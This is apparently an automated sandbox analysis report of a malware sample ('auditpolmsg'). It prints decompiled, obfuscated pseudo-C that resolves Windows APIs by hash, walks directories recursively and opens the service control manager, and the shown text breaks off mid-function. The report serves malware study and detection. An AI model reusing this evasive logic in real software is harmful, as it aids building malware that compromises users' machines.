                                                        0x00369011
                                                        0x00000000
                                                        0x00368f85
                                                        0x00368f8a
                                                        0x00368fd5
                                                        0x00368fed
                                                        0x00368fed
                                                        0x00368ff9
                                                        0x00368ffb
                                                        0x00369009
                                                        0x00000000
                                                        0x00368f8c
                                                        0x00368f91
                                                        0x00000000
                                                        0x00368f93
                                                        0x00368f93
                                                        0x00368f99
                                                        0x00368fa3
                                                        0x00368fa5
                                                        0x00368fa8
                                                        0x00368fae
                                                        0x00368fb1
                                                        0x00000000
                                                        0x00368fb1
                                                        0x00368f91
                                                        0x00368f8a
                                                        0x00000000
                                                        0x00368f7f
                                                        0x00368eab
                                                        0x00368f3f
                                                        0x00368f46
                                                        0x00368f59
                                                        0x00368f5e
                                                        0x00368f5e
                                                        0x00368f64
                                                        0x00368f6d
                                                        0x00368f70
                                                        0x00000000
                                                        0x00368eb1
                                                        0x00368eb6
                                                        0x0036901b
                                                        0x00369022
                                                        0x00369035
                                                        0x0036903a
                                                        0x0036903a
                                                        0x00369040
                                                        0x00000000
                                                        0x00368ebc
                                                        0x00368ec1
                                                        0x00368efc
                                                        0x00368f03
                                                        0x00368f16
                                                        0x00368f1b
                                                        0x00368f1b
                                                        0x00368f2b
                                                        0x00368f2f
                                                        0x00369042
                                                        0x00369049
                                                        0x00368f35
                                                        0x00368f35
                                                        0x00000000
                                                        0x00368f35
                                                        0x00368ec3
                                                        0x00368ec8
                                                        0x00000000
                                                        0x00368ece
                                                        0x00368ece
                                                        0x00368ed5
                                                        0x00368ee8
                                                        0x00368eed
                                                        0x00368eed
                                                        0x00368ef3
                                                        0x00368ef5
                                                        0x00000000
                                                        0x00368ef5
                                                        0x00368ec8
                                                        0x00368ec1
                                                        0x00368eb6
                                                        0x00000000
                                                        0x00368fbb
                                                        0x00368fbb
                                                        0x00368fcd
                                                        0x00000000

                                                        APIs
                                                        • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,005CE050,00368782,?,3251FEFE,?), ref: 00368FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenService
                                                        • String ID: P\$uw(#$uw(#
                                                        • API String ID: 3098006287-4189060273
                                                        • Opcode ID: 30a198ba87fabc04cfac2f53f523f7ae63167920d6bf38b5b0a80713e0fc4607
                                                        • Instruction ID: a55e9698731c28e8d69a941a746e2ccab2bf80010cb30940164e7c9c2859e30c
                                                        • Opcode Fuzzy Hash: 30a198ba87fabc04cfac2f53f523f7ae63167920d6bf38b5b0a80713e0fc4607
                                                        • Instruction Fuzzy Hash: 63410525B002008BDB226BBDAC9077B229EA788750F21CA29F905CF749EFA1CC4457A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 447 3638f0-36390b 448 363910-363915 447->448 449 36391b 448->449 450 363a69-363a6e 448->450 453 363921-363926 449->453 454 363a5f-363a64 449->454 451 363a70-363a75 450->451 452 363acc-363adf call 3634c0 450->452 455 363ab6-363abb 451->455 456 363a77-363a7e 451->456 468 363ae1-363af7 call 363f00 call 363e60 452->468 469 363afc-363b17 452->469 457 363a17-363a1e 453->457 458 36392c-363931 453->458 454->448 455->448 465 363ac1-363acb 455->465 461 363a80-363a96 call 363f00 call 363e60 456->461 462 363a9b-363ab1 456->462 463 363a20-363a36 call 363f00 call 363e60 457->463 464 363a3b-363a4f FindFirstFileW 457->464 466 363937-36393c 458->466 467 363b70-363b77 458->467 461->462 462->448 463->464 474 363b97-363ba1 464->474 475 363a55-363a5a 464->475 466->455 476 363942-363947 466->476 472 363b94 467->472 473 363b79-363b8f call 363f00 call 363e60 467->473 468->469 497 363b34-363b3f 469->497 498 363b19-363b2f call 363f00 call 363e60 469->498 472->474 473->472 475->448 477 3639f1-363a12 476->477 478 36394d-363953 476->478 477->448 484 363974-363976 478->484 485 363955-36395d 478->485 492 36396d-363972 484->492 494 363978-36398b call 3634c0 484->494 491 36395f-363963 485->491 485->492 491->484 501 363965-36396b 491->501 492->448 511 36398d-3639a3 call 363f00 call 363e60 494->511 512 3639a8-3639ec call 3638f0 call 363460 494->512 509 363b41-363b57 call 363f00 call 363e60 497->509 510 363b5c-363b6b 497->510 498->497 501->484 501->492 509->510 510->448 511->512 512->448
                                                        C-Code - Quality: 63%
                                                        			E003638F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x36e430 == 0) {
                                                        								 *0x36e430 = E00363E60(_t56, E00363F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x36dba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E00363E60(_t56, E00363F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x36dba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E003634C0(0x36d290);
                                                        											_t50 =  *0x36e158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E00363E60(_t56, E00363F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x36e158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E003638F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E00363460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E003634C0(0x36d260);
                                                        					_t24 =  *0x36e158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E00363E60(_t56, E00363F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x36e158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x36e494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E00363E60(_t56, E00363F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x36e494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x36df30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E00363E60(_t56, E00363F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x36df30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x36df88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E00363E60(_t56, E00363F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x36df88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x003638fa
                                                        0x003638fc
                                                        0x003638fe
                                                        0x00363902
                                                        0x00363907
                                                        0x00363910
                                                        0x00363910
                                                        0x00363910
                                                        0x00363915
                                                        0x00000000
                                                        0x00000000
                                                        0x0036391b
                                                        0x00363a5f
                                                        0x00000000
                                                        0x00363921
                                                        0x00363926
                                                        0x00363a1e
                                                        0x00363a36
                                                        0x00363a36
                                                        0x00363a48
                                                        0x00363a4a
                                                        0x00363a4f
                                                        0x00363ba1
                                                        0x00363a55
                                                        0x00363a55
                                                        0x00000000
                                                        0x00363a55
                                                        0x0036392c
                                                        0x00363931
                                                        0x00363b70
                                                        0x00363b77
                                                        0x00363b8a
                                                        0x00363b8f
                                                        0x00363b8f
                                                        0x00000000
                                                        0x00363b95
                                                        0x0036393c
                                                        0x00363ab6
                                                        0x00363abb
                                                        0x00000000
                                                        0x00363acb
                                                        0x00363acb
                                                        0x00363acb
                                                        0x00363942
                                                        0x00363947
                                                        0x003639fd
                                                        0x00363a06
                                                        0x00363a0d
                                                        0x0036394d
                                                        0x00363953
                                                        0x00363974
                                                        0x00363976
                                                        0x00000000
                                                        0x00363978
                                                        0x00363982
                                                        0x00363984
                                                        0x0036398b
                                                        0x0036399e
                                                        0x003639a3
                                                        0x003639a3
                                                        0x003639bc
                                                        0x003639d8
                                                        0x003639dd
                                                        0x003639e2
                                                        0x003639e7
                                                        0x003639e7
                                                        0x00363955
                                                        0x00363955
                                                        0x0036395d
                                                        0x0036396d
                                                        0x0036396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0036395d
                                                        0x00363953
                                                        0x00000000
                                                        0x00363947
                                                        0x0036393c
                                                        0x00363926
                                                        0x00000000
                                                        0x0036391b
                                                        0x00363a6e
                                                        0x00363ad6
                                                        0x00363ad8
                                                        0x00363adf
                                                        0x00363af2
                                                        0x00363af7
                                                        0x00363af7
                                                        0x00363b0b
                                                        0x00363b0d
                                                        0x00363b12
                                                        0x00363b17
                                                        0x00363b2a
                                                        0x00363b2f
                                                        0x00363b2f
                                                        0x00363b36
                                                        0x00363b38
                                                        0x00363b3f
                                                        0x00363b52
                                                        0x00363b57
                                                        0x00363b57
                                                        0x00363b60
                                                        0x00363b62
                                                        0x00363b66
                                                        0x00000000
                                                        0x00363a70
                                                        0x00363a75
                                                        0x00000000
                                                        0x00363a77
                                                        0x00363a77
                                                        0x00363a7e
                                                        0x00363a91
                                                        0x00363a96
                                                        0x00363a96
                                                        0x00363aa1
                                                        0x00363aa5
                                                        0x00363aac
                                                        0x00000000
                                                        0x00363aac
                                                        0x00363a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00363A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: 73934dd5f95f71246a505a44b4f50180ded987a0c92bdc5ee36e3ec7ffc73b78
                                                        • Instruction ID: 9bc92c9b86076307876f5e6a60595dab57791928c5ec2aebd0858d92ab7c04ac
                                                        • Opcode Fuzzy Hash: 73934dd5f95f71246a505a44b4f50180ded987a0c92bdc5ee36e3ec7ffc73b78
                                                        • Instruction Fuzzy Hash: DF5134717042000BCB26ABB9D845B7B36EA9B91300F01C919F452CB399EFB6CF1597A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E00365040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x36e494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E00363E60(_t58, E00363F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x36e494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x36dd18;
                                                        								if( *0x36dd18 == 0) {
                                                        									 *0x36dd18 = E00363E60(_t58, E00363F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x36e484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E00363E60(_t58, E00363F00(0x26f5757c), 0x9e91db81, _t112);
                                                        									 *0x36e484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x36e18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E00363E60(_t58, E00363F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x36e18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x36e29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E00363E60(_t58, E00363F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x36e29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x36de08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E00363E60(_t58, E00363F00(0x9bab0b12), 0xd8ef4c49, _t112);
                                                        												 *0x36de08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x36e494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E00363E60(_t58, E00363F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x36e494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x36df30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E00363E60(_t58, E00363F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x36df30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x36e494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E00363E60(_t58, E00363F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x36e494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x36df30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E00363E60(_t58, E00363F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x36df30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x36e270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E00363E60(_t58, E00363F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x36e270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x36e200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E00363E60(_t58, E00363F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x36e200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E003642C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x00365047
                                                        0x0036504b
                                                        0x0036504d
                                                        0x00365051
                                                        0x00365053
                                                        0x00365057
                                                        0x0036505c
                                                        0x0036505c
                                                        0x00365060
                                                        0x00365060
                                                        0x00365060
                                                        0x00365066
                                                        0x00000000
                                                        0x00000000
                                                        0x003651af
                                                        0x003651b5
                                                        0x003652f9
                                                        0x003652ff
                                                        0x00000000
                                                        0x00365301
                                                        0x00365301
                                                        0x00365306
                                                        0x00365308
                                                        0x0036531b
                                                        0x00365320
                                                        0x00365320
                                                        0x00365327
                                                        0x0036532e
                                                        0x00365330
                                                        0x00365348
                                                        0x00365348
                                                        0x00365355
                                                        0x00365357
                                                        0x00365359
                                                        0x0036535b
                                                        0x0036535d
                                                        0x0036505c
                                                        0x0036505c
                                                        0x00000000
                                                        0x0036505c
                                                        0x0036505c
                                                        0x0036535b
                                                        0x003651bb
                                                        0x003651bb
                                                        0x00365277
                                                        0x0036527c
                                                        0x0036527e
                                                        0x00365291
                                                        0x00365296
                                                        0x00365296
                                                        0x003652ac
                                                        0x003652b0
                                                        0x003652b2
                                                        0x003652bd
                                                        0x003652c3
                                                        0x003652c5
                                                        0x003652d8
                                                        0x003652dd
                                                        0x003652dd
                                                        0x003652e6
                                                        0x00000000
                                                        0x003651c1
                                                        0x003651c1
                                                        0x003651c7
                                                        0x0036526d
                                                        0x00000000
                                                        0x003651cd
                                                        0x003651cd
                                                        0x003651d3
                                                        0x003652e8
                                                        0x003652e8
                                                        0x003652ee
                                                        0x0036505c
                                                        0x0036505c
                                                        0x00000000
                                                        0x0036505c
                                                        0x0036505c
                                                        0x003651d9
                                                        0x003651d9
                                                        0x003651de
                                                        0x003651e0
                                                        0x003651f3
                                                        0x003651f8
                                                        0x003651f8
                                                        0x0036521b
                                                        0x0036521d
                                                        0x0036521f
                                                        0x003650ef
                                                        0x003650ef
                                                        0x0036505c
                                                        0x0036505c
                                                        0x00000000
                                                        0x0036505c
                                                        0x00365225
                                                        0x00365225
                                                        0x0036522a
                                                        0x0036522c
                                                        0x0036523f
                                                        0x00365244
                                                        0x00365244
                                                        0x00365249
                                                        0x0036524e
                                                        0x0036525b
                                                        0x0036525d
                                                        0x0036525f
                                                        0x00365261
                                                        0x00365265
                                                        0x00000000
                                                        0x00365265
                                                        0x00000000
                                                        0x0036521f
                                                        0x003651d3
                                                        0x003651c7
                                                        0x003651bb
                                                        0x003653c0
                                                        0x003653c0
                                                        0x00000000
                                                        0x003653c0
                                                        0x0036506c
                                                        0x00365367
                                                        0x0036536c
                                                        0x0036536e
                                                        0x00365381
                                                        0x00365386
                                                        0x00365386
                                                        0x0036538d
                                                        0x0036538f
                                                        0x00365394
                                                        0x00365396
                                                        0x003653a9
                                                        0x003653ae
                                                        0x003653ae
                                                        0x00000000
                                                        0x003653b7
                                                        0x00365072
                                                        0x00365078
                                                        0x003650f9
                                                        0x003650ff
                                                        0x00365153
                                                        0x00365158
                                                        0x0036515a
                                                        0x0036516d
                                                        0x00365172
                                                        0x00365172
                                                        0x00365179
                                                        0x0036517b
                                                        0x00365180
                                                        0x00365182
                                                        0x00365195
                                                        0x0036519a
                                                        0x0036519a
                                                        0x003651a3
                                                        0x003651a5
                                                        0x00000000
                                                        0x00365101
                                                        0x00365101
                                                        0x00365107
                                                        0x00000000
                                                        0x0036510d
                                                        0x0036510d
                                                        0x00365112
                                                        0x00365114
                                                        0x00365127
                                                        0x0036512c
                                                        0x0036512c
                                                        0x00365139
                                                        0x0036513b
                                                        0x0036513d
                                                        0x0036514b
                                                        0x0036505c
                                                        0x0036505c
                                                        0x00000000
                                                        0x0036505c
                                                        0x0036505c
                                                        0x00365107
                                                        0x0036507a
                                                        0x0036507a
                                                        0x003650c2
                                                        0x003650c7
                                                        0x003650c9
                                                        0x003650dc
                                                        0x003650e1
                                                        0x003650e1
                                                        0x003650ed
                                                        0x00000000
                                                        0x0036507c
                                                        0x00365082
                                                        0x003650ad
                                                        0x003650b0
                                                        0x003650b2
                                                        0x003650ba
                                                        0x00000000
                                                        0x00365084
                                                        0x0036508a
                                                        0x00000000
                                                        0x00365090
                                                        0x0036509a
                                                        0x003650a8
                                                        0x0036505c
                                                        0x0036505c
                                                        0x00000000
                                                        0x0036505c
                                                        0x0036505c
                                                        0x0036508a
                                                        0x00365082
                                                        0x0036507a
                                                        0x00000000
                                                        0x00365078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,00368AC8,?,3251FEFE,?,?), ref: 00365355
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 6a81e9df02a975fafa610ed9329d170e372d3c6b9713e63d0e7049c1250bd43c
                                                        • Instruction ID: d081c8a6a2d5950875ba3c88541ee66c21b86c10a7822c8060faeaf38530df81
                                                        • Opcode Fuzzy Hash: 6a81e9df02a975fafa610ed9329d170e372d3c6b9713e63d0e7049c1250bd43c
                                                        • Instruction Fuzzy Hash: 2F810432F447114BDB13AF798CA172A36EEABA4B44F12C439F811DF299EAA1CD0447D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 73%
                                                        			E00369860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x36e310;
                                                        							if( *0x36e310 == 0) {
                                                        								 *0x36e310 = E00363E60(_t64, E00363F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x36e54c; // 0x5ce050
